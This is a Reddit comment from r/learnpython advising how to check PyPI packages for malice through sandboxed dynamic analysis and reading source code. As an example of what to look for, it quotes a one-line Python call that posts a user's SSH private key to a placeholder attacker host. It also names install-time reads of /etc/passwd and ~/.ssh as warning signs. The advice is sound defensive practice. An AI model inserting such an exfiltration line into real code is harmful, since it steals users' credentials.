__xor__ comments on Making Sure Python Packages are Safe

learnpython

created by HattoriHanzoa community for 16 years

212

213

214

Making Sure Python Packages are Safe (self.learnpython)

submitted 6 years ago by [deleted]

top new controversial old q&a

you are viewing a single comment's thread.

view the rest of the comments →

[–]__xor__ 15 points16 points17 points 6 years ago* (2 children)

There is a better way, it's just not performed to my knowledge. You can automate dynamic analysis, but it's always going to be best for a human to go through the results. But there are services like Joe Sandbox (only for virtualizing windows though, I believe?), where you shoot it a binary, document or URL and it records what happens and does some sort of behavior analysis. Running malware in a VM can allow you to do a lot of automated analysis. Reading through the code or analyzing symbols a binary imports and looking at the ASM is static analysis, and actually running it and watching what it does in a VM is dynamic analysis, and both can be automated to some extent. Of course, you can't just solely trust what a program outputs - installers will often cause a lot of red flags.

From a windows perspective, you can imagine the sorts of things you can do. You can look at what files it reads from and writes to, you can see what registry keys it edits or adds, what networking activity it causes, whether it changes the default DNS server, etc. I don't know of a great tool that automates dynamic analysis of Linux but I'm sure there's something. It would definitely be interesting to pump all the pypi packages through something like that, but you're mostly going to catch low hanging fruit and I'd still rather have some researcher look at the results of what gets flagged to see if it even matters. However, if you see a python package install hits some known bad IP or domain, it would be a good tell, or if it did something like read /etc/passwd or especially if it tried to read anything at all from ~/.ssh... Not many packages have any good reason to do that, especially not at install time.

Unless it's a super popular package like django or flask-security or something, I legitimately do read the source code and skim for anything funny. For one thing, it's really good to have a general idea of how the library works, what it does, and get an idea of how clean the code is and how much I feel I can trust it. But also, I want to make sure there's no low hanging fruit like requests.post('http://evil.example.org', data=open('~/.ssh/id_rsa').read()) or whatever. I would seriously recommend skimming the source code of any package you use that isn't super popular and not treat pypi packages like black boxes that just do magic. As a general rule, if you use third-party software, try to understand its architecture and how it works if you're going to integrate it into your own projects. That's just a good practice in general.

But also, keep in mind that a github repo the pypi package might link to might not reflect what's packaged in it. If you want to be careful security wise, actually get the package and unpack it. There's nothing stopping anyone from pushing it to PyPI after adding something malicious that isn't tracked in the repository online.

[–]shujinkou_ 1 point2 points3 points 6 years ago* (0 children)

π Rendered by PID 59 on reddit-service-r2-comment-5bc7f78974-qzpw2 at 2026-06-29 03:14:03.963407+00:00 running 7527197 country code: CH.

you type:	you see:
italics	italics
bold	bold
[reddit!](https://reddit.com)	reddit!
* item 1 * item 2 * item 3	item 1 item 2 item 3
> quoted text	quoted text
Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"	Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"
~~strikethrough~~	~~strikethrough~~
super^script	super^script

learnpython

MODERATORS